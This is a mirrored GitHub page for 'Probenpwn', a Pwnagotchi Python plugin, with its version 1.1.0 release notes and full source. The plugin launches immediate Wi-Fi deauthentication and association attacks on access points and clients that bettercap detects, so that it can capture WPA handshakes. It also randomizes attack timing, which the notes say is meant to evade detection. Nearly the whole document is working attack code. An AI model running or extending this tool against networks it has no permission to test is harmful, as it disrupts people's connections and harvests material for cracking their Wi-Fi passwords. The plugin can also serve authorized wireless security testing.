mirror of
https://github.com/AlienMajik/pwnagotchi_plugins.git
synced 2025-07-01 18:37:27 -04:00

What's New in Probenpwn 1.1.0: Dynamic Parameter Tuning: The dynamic_attack_delay method now adjusts the attack delay based not only on the client’s signal strength but also on the number of previous attack attempts for a given AP (Access Point). As the number of attacks increases, the delay between attacks decreases slightly, making the attacks more aggressive while preventing the system from overloading. The delay is further randomized with random.uniform(0.9, 1.1) to prevent detection by automated systems that might look for consistent attack patterns. Watchdog Thread for Recovery: The plugin introduces a watchdog thread that periodically checks for the presence of the wlan0mon interface, which is essential for monitoring Wi-Fi networks. If this interface is missing (likely due to a Wi-Fi adapter crash), the watchdog attempts to restart the Pwnagotchi system automatically by running a systemctl restart command, providing a more robust recovery mechanism. Tracking and Limiting Attack Attempts: The plugin now tracks the number of attack attempts for each AP using a dictionary (attack_attempts). If an AP has been attacked more than a certain number of times, the delay for subsequent attacks is adjusted to prevent excessive and repetitive attacking, reducing the risk of detection. This approach helps balance the aggressiveness of the attacks with performance considerations, ensuring that the plugin remains effective over extended periods. Tracking Successful Handshakes: The plugin now also tracks the number of successful handshakes captured per AP with the success_counts dictionary. Each time a handshake is successfully captured, the count for that AP is incremented. This can be useful for monitoring attack success rates and potentially adjusting attack strategies based on success frequency. Improved Device Handling: The handling of new and updated APs and clients is more refined. The plugin ensures that each device (AP or client) is only attacked if it's not on the whitelist. Devices are also tracked more effectively with better time management, ensuring that only recently seen devices are targeted. The track_recent method tracks both APs and clients, with more granular control over when devices should be removed from the recent list based on activity. Channel Sanitization: The plugin includes a new sanitize_channel_list method, which ensures that only valid Wi-Fi channels (1-14 for 2.4 GHz and 36-165 for 5 GHz) are included in the scan list. This prevents attempts to scan invalid channels and ensures more efficient use of scanning resources. Enhanced Logging and Error Handling: The plugin now includes more detailed logging, especially around the dynamic attack delay, attack attempts, and handshakes. The logging makes it easier to monitor the plugin's behavior and diagnose issues. It also improves error handling by catching and logging exceptions in key methods, ensuring that the plugin can gracefully handle unexpected issues without crashing.
195 lines
8.1 KiB
Python
195 lines
8.1 KiB
Python
import logging
|
||
import time
|
||
import threading
|
||
import os
|
||
import subprocess
|
||
import random
|
||
import pwnagotchi.plugins as plugins
|
||
|
||
class probenpwn(plugins.Plugin):
|
||
__author__ = 'AlienMajik'
|
||
__version__ = '1.1.0'
|
||
__license__ = 'GPL3'
|
||
__description__ = (
|
||
'Pwn more aggressively. Launch immediate associate or deauth attack '
|
||
'when bettercap spots a device, with enhanced performance for more handshakes. '
|
||
'Enhanced with dynamic parameter tuning, randomization, and feedback loop.'
|
||
)
|
||
|
||
def __init__(self):
|
||
logging.debug("ProbeNpwn plugin created")
|
||
self._agent = None
|
||
self.old_name = None
|
||
self.recents = {}
|
||
self.whitelist = set()
|
||
self.attack_threads = []
|
||
self.epoch_duration = 60 # default epoch duration in seconds
|
||
self._watchdog_thread = None
|
||
# Track number of attack attempts per AP MAC address
|
||
self.attack_attempts = {}
|
||
# Optionally, track the number of successful handshakes per AP
|
||
self.success_counts = {}
|
||
|
||
def on_unload(self, ui):
|
||
if self.old_name:
|
||
ui.set('name', "%s " % self.old_name)
|
||
else:
|
||
ui.set('name', "%s> " % ui.get('name')[:-3])
|
||
self.old_name = None
|
||
logging.info("Probing out.")
|
||
|
||
def on_ui_setup(self, ui):
|
||
self._ui = ui
|
||
|
||
def on_ui_update(self, ui):
|
||
if self.old_name is None:
|
||
self.old_name = ui.get('name')
|
||
if self.old_name:
|
||
i = self.old_name.find('>')
|
||
if i:
|
||
ui.set('name', "%s%s" % (self.old_name[:i], "!!!"))
|
||
|
||
def on_ready(self, agent):
|
||
self._agent = agent
|
||
logging.info("Probed and Pwnd!")
|
||
agent.run("wifi.clear")
|
||
if self._ui:
|
||
self._ui.set("status", "Probe engaged... \nPWNing your signals, Earthlings!")
|
||
self._watchdog_thread = threading.Thread(target=self._watchdog, daemon=True)
|
||
self._watchdog_thread.start()
|
||
|
||
def _watchdog(self):
|
||
CHECK_INTERVAL = 5 # seconds between checks
|
||
while True:
|
||
if not os.path.exists("/sys/class/net/wlan0mon"):
|
||
logging.error("wlan0mon interface missing! This likely indicates a Wi‑Fi adapter crash. "
|
||
"Executing 'sudo systemctl restart pwnagotchi' to recover.")
|
||
try:
|
||
subprocess.run(["sudo", "systemctl", "restart", "pwnagotchi"], check=True)
|
||
except Exception as e:
|
||
logging.error("Failed to execute restart command: %s", e)
|
||
break # Stop checking after issuing the recovery command.
|
||
time.sleep(CHECK_INTERVAL)
|
||
|
||
def track_recent(self, ap, cl=None):
|
||
ap['_track_time'] = time.time()
|
||
self.recents[ap['mac'].lower()] = ap
|
||
if cl:
|
||
cl['_track_time'] = ap['_track_time']
|
||
self.recents[cl['mac'].lower()] = cl
|
||
|
||
def ok_to_attack(self, ap):
|
||
if not self._agent:
|
||
return False
|
||
if ap.get('hostname', '').lower() in self.whitelist or ap['mac'].lower() in self.whitelist:
|
||
return False
|
||
return True
|
||
|
||
def attack_target(self, agent, ap, cl):
|
||
if not self.ok_to_attack(ap):
|
||
return
|
||
ap_mac = ap['mac'].lower()
|
||
self.attack_attempts[ap_mac] = self.attack_attempts.get(ap_mac, 0) + 1
|
||
logging.debug(f"Launching attack on AP {ap['mac']} and client {cl['mac'] if cl else 'N/A'}; attempt {self.attack_attempts[ap_mac]}")
|
||
if cl:
|
||
delay = self.dynamic_attack_delay(ap, cl)
|
||
agent.deauth(ap, cl, delay)
|
||
agent.associate(ap, 0.2)
|
||
|
||
def dynamic_attack_delay(self, ap, cl):
|
||
signal = cl.get('signal', -100) if cl is not None else -100
|
||
if signal < -60:
|
||
base_delay = 0.5
|
||
else:
|
||
base_delay = 0.25
|
||
|
||
ap_mac = ap['mac'].lower()
|
||
attempts = self.attack_attempts.get(ap_mac, 0)
|
||
if attempts > 10:
|
||
base_delay *= 0.6
|
||
elif attempts > 5:
|
||
base_delay *= 0.8
|
||
|
||
randomized_delay = base_delay * random.uniform(0.9, 1.1)
|
||
logging.debug(f"Dynamic attack delay for AP {ap['mac']} (signal {signal} dBm, {attempts} attempts): {randomized_delay:.3f}s")
|
||
return randomized_delay
|
||
|
||
def on_bcap_wifi_ap_new(self, agent, event):
|
||
try:
|
||
ap = event['data']
|
||
if agent._config['personality']['associate'] and self.ok_to_attack(ap):
|
||
logging.debug("insta-associate: %s (%s)", ap.get('hostname', 'Unknown AP'), ap['mac'])
|
||
attack_thread = threading.Thread(target=self.attack_target, args=(agent, ap, None))
|
||
attack_thread.start()
|
||
self.attack_threads.append(attack_thread)
|
||
except Exception as e:
|
||
logging.error("Error in on_bcap_wifi_ap_new: %s", repr(e))
|
||
|
||
def on_bcap_wifi_client_new(self, agent, event):
|
||
try:
|
||
ap = event['data']['AP']
|
||
cl = event['data']['Client']
|
||
if (agent._config['personality']['deauth'] and
|
||
self.ok_to_attack(ap) and
|
||
self.ok_to_attack(cl)):
|
||
logging.debug("insta-deauth: %s (%s) -> '%s' (%s) (%s)",
|
||
ap.get('hostname', 'Unknown AP'), ap['mac'],
|
||
cl.get('hostname', 'Unknown Client'), cl['mac'], cl['vendor'])
|
||
attack_thread = threading.Thread(target=self.attack_target, args=(agent, ap, cl))
|
||
attack_thread.start()
|
||
self.attack_threads.append(attack_thread)
|
||
except Exception as e:
|
||
logging.error("Error in on_bcap_wifi_client_new: %s", repr(e))
|
||
|
||
def on_handshake(self, agent, filename, ap, cl):
|
||
ap_mac = ap['mac'].lower()
|
||
logging.info("Handshake detected from %s", ap['mac'])
|
||
if ap_mac in self.attack_attempts:
|
||
del self.attack_attempts[ap_mac]
|
||
self.success_counts[ap_mac] = self.success_counts.get(ap_mac, 0) + 1
|
||
if 'mac' in ap and 'mac' in cl:
|
||
logging.info("Captured handshake from %s (%s) -> '%s' (%s) (%s)",
|
||
ap.get('hostname', 'Unknown AP'), ap['mac'], cl.get('hostname', 'Unknown Client'), cl['mac'], cl['vendor'])
|
||
if ap_mac in self.recents:
|
||
del self.recents[ap_mac]
|
||
cl_mac = cl['mac'].lower()
|
||
if cl_mac in self.recents:
|
||
del self.recents[cl_mac]
|
||
|
||
def on_epoch(self, agent, epoch, epoch_data):
|
||
for mac in list(self.recents):
|
||
if self.recents[mac]['_track_time'] < (time.time() - (self.epoch_duration * 2)):
|
||
del self.recents[mac]
|
||
|
||
def on_bcap_wifi_ap_updated(self, agent, event):
|
||
try:
|
||
ap = event['data']
|
||
if self.ok_to_attack(ap):
|
||
logging.debug("AP updated: %s (%s)", ap.get('hostname', 'Unknown AP'), ap['mac'])
|
||
self.track_recent(ap)
|
||
except Exception as e:
|
||
logging.error("Error in on_bcap_wifi_ap_updated: %s", repr(e))
|
||
|
||
def on_bcap_wifi_client_updated(self, agent, event):
|
||
try:
|
||
ap = event['data']['AP']
|
||
cl = event['data']['Client']
|
||
if self.ok_to_attack(ap) and self.ok_to_attack(cl):
|
||
logging.debug("Client updated: %s (%s) -> '%s' (%s) (%s)",
|
||
ap.get('hostname', 'Unknown AP'), ap['mac'], cl.get('hostname', 'Unknown Client'), cl['mac'], cl['vendor'])
|
||
self.track_recent(ap, cl)
|
||
except Exception as e:
|
||
logging.error("Error in on_bcap_wifi_client_updated: %s", repr(e))
|
||
|
||
def sanitize_channel_list(self, channels):
|
||
"""
|
||
Sanitize the channel list to ensure only valid channels are included.
|
||
Channels for 2.4 GHz should be between 1 and 14, and for 5 GHz, it should be between 36 and 165.
|
||
"""
|
||
valid_channels = [ch for ch in channels if 1 <= ch <= 14 or 36 <= ch <= 165]
|
||
if not valid_channels:
|
||
logging.error("No valid channels to scan.")
|
||
return [] # Return an empty list if no valid channels are found
|
||
logging.debug(f"Scanning the following valid channels: {valid_channels}")
|
||
return valid_channels
|